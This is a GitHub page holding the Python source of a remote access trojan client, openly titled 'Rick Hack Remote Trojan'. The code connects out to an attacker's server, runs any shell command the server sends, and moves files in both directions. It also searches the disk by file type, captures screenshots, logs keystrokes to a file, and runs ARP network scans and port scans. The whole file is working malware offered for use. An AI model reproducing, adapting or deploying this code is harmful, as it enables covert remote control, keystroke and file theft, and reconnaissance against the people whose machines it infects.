-
Notifications
You must be signed in to change notification settings - Fork 0
/
rick_trojan_client.py
326 lines (233 loc) · 9.4 KB
/
rick_trojan_client.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
# -*- coding: utf-8 -*-
#Rick Hack Remote Trojan v 1.0
#This is the client Code
#This script connect to remote server and give a reverse shell
#tested on Windows 7 System
#pip install image
#pip install socket
#pip install subprocess
#pip install os
#pip install random
#pip install time
#pip install pynput
#pip install scapy
#libraries
import socket
import subprocess
import os
import time
import random
import threading
import multiprocessing
from PIL import ImageGrab # Used to Grab a screenshot
import tempfile # Used to Create a temp directory
import shutil # Used to Remove the temp directory
#used to Keylogger
from pynput.keyboard import Key, Listener
from datetime import datetime
from scapy.all import ARP, Ether, srp
def networkscan(ip_range,c):
# IP Address for the destination
# create ARP packet
arp = ARP(pdst=ip_range)
# create the Ether broadcast packet
# ff:ff:ff:ff:ff:ff MAC address indicates broadcasting
ether = Ether(dst="ff:ff:ff:ff:ff:ff")
# stack them
packet = ether/arp
result = srp(packet, timeout=3, verbose=0)[0]
# a list of clients, we will fill this in the upcoming loop
clients = []
for sent, received in result:
# for each response, append ip and mac address to `clients` list
clients.append({'ip': received.psrc, 'mac': received.hwsrc})
# print clients
result=""
result+=("Available devices in the network:" + '\n')
result+=("IP" + " "*18+"MAC" + '\n')
for client in clients:
result+=("{:16} {}".format(client['ip'], client['mac']) + '\n')
print(result)
c.send(result.encode())
#function to capture the key pressed and record in keylogger txt file
def on_press(key):
global interact
fp=open("keylogs.txt","a") #create a text file and append the key in it
print(key)
#avalidar a log
today = datetime.now()
now = today.ctime()
fp.write(str(now) + " pressed key: " + str(key)+ "\n")
fp.close()
interact += 1
print(interact)
#record only 10 digited key's
if interact >= 10 :
return False
#Principal function to enable the keylogger
def keylogger():
global interact
interact = int(0)
#listenter object
listener = Listener(on_press=on_press)
listener.start()
"""while True:
with Listener(on_press=on_press) as listener:
print("algo")
listener.join()
break
"""
#Function to call keylogger in threading mode
def keylogger_submit():
#creating a thread to call function kaylogger()
keylogger_thread = threading.Thread(target=keylogger(),args=())
keylogger_thread.start()
def scan(ip_target,ports_target,c):
c.send("Scanning for open ports \n".encode())
meusocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
porta= ports_target.split(',')
for porta in porta:
xport = int(porta)
result = ""
if meusocket.connect_ex((ip_target, xport)) == 0:
result =("Port " + porta + "[OPEN]" + "\n")
print(result)
c.send(result.encode())
meusocket.close()
else:
result =("Port " + porta + "[CLOSED]" + "\n")
print(result)
c.send(result.encode())
def transfer_up(c, command, path):
f = open(path, 'wb')
while True:
bits = c.recv(2048)
if bits.endswith('DONE'.encode()):
f.write(bits[:-4])
f.close()
c.send('[+] upload transfer completed'.encode())
break
if 'file not found'.encode() in bits:
c.send('[-] impossible to transfer'.encode())
break
f.write(bits)
def transfer(c, path):
if os.path.exists(path):
f = open(path, 'rb')
packet = f.read(2048)
while len(packet) > 0:
c.send(packet)
packet = f.read(2048)
c.send('DONE'.encode())
f.close()
else:
c.send('file not found'.encode())
def conexao():
while True:
#Get parameters from txt
path = os.getcwd().strip('/n')
print(path)
file = os.path.join(path,'ip.txt')
file = open(file)
print(file)
lines = file.readlines()
#getting ip and port of remote server
for lines in lines:
ip = lines.split(',', 1)[0]
port = int(lines.split(',', 1)[1])
file.close()
print("Remote server is")
print(ip)
print(port)
c = socket.socket()
c.connect((ip,port))
while True:
command = c.recv(2048)
command = command.decode()
print("comando executado:" + command)
if 'terminate' in command:
c.close()
#break
return 1
#upload
elif 'upload ' in command:
path = os.getcwd()
arquivo = command.split(" ",2)[2]
print(arquivo)
path =(path + "\\" + arquivo)
transfer_up(c, command, path)
elif 'download ' in command:
download, path = command.split(' ')
try:
transfer(c, path)
except Exception as e:
c.send(str(e).encode())
pass
elif 'cd ' in command:
code, directory = command.split(' ')# the formula here is gonna be cd*directory
try:
os.chdir(directory) # changing the directory
c.send(('[+] CWD is ' + os.getcwd()).encode()) # we send back a string mentioning the new CWD
except Exception as e:
c.send(('[-] ' + str(e)).encode())
elif 'exit' in command:
print("ending of session!")
main()
elif 'search' in command: #The Formula is search <path>*.<file extension> -->for example let's say that we got search C:\\*.pdf
command = command[7:] #cut off the the first 7 character ,, output would be C:\\*.pdf
path, ext = command.split('*')
lists = '' # here we define a string where we will append our result on it
for dirpath, dirname, files in os.walk(path):
for file in files:
if file.endswith(ext):
lists = lists + '\n' + os.path.join(dirpath, file)
c.send(lists.encode())
elif 'screencap' in command:
dirpath = tempfile.mkdtemp()
print(dirpath)
ImageGrab.grab().save(dirpath + "\img.jpg", "JPEG")
path = "Generated in path: " + dirpath + "\img.jpg use download function to get your screencap file"
print(path)
c.send(path.encode())
elif 'portscan ' in command:
print(command)
ip_target = command.split(' ')[1]
ports_target = command.split(' ')[2]
scan(ip_target,ports_target,c)
elif 'networkscan ' in command:
c.send("starting network scan...".encode())
ip_range = command.split(' ')[1]
networkscan(ip_range,c)
elif 'keylogger on' in command:
time.sleep(1)
c.send('Keylogger on'.encode())
#Creating a subprocess to call keylogger_submit() function
p = multiprocessing.Process(target=keylogger_submit())
p.start()
#wait 20 seconds, before kill the multiprocess of keylogger_submit()
p.join(20)
#killing process after seconds of wait but istill keyloggin in background
#This is necessary to free the session of keylogger and make script able to
#receive another commands
if p.is_alive():
print("keylogger still running... let's kill it..")
p.terminate()
#listener.stop()
c.send('keylogger killed'.encode())
pass
#else another commands, for exemple, System Operation commands
else:
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
c.send(CMD.stdout.read())
c.send(CMD.stderr.read())
def main():
# verify if server is alive
while True:
try:
if conexao() == 1:
break
except:
sleep_for = random.randrange(1,2)
time.sleep(int(sleep_for))
if __name__ == '__main__':
main()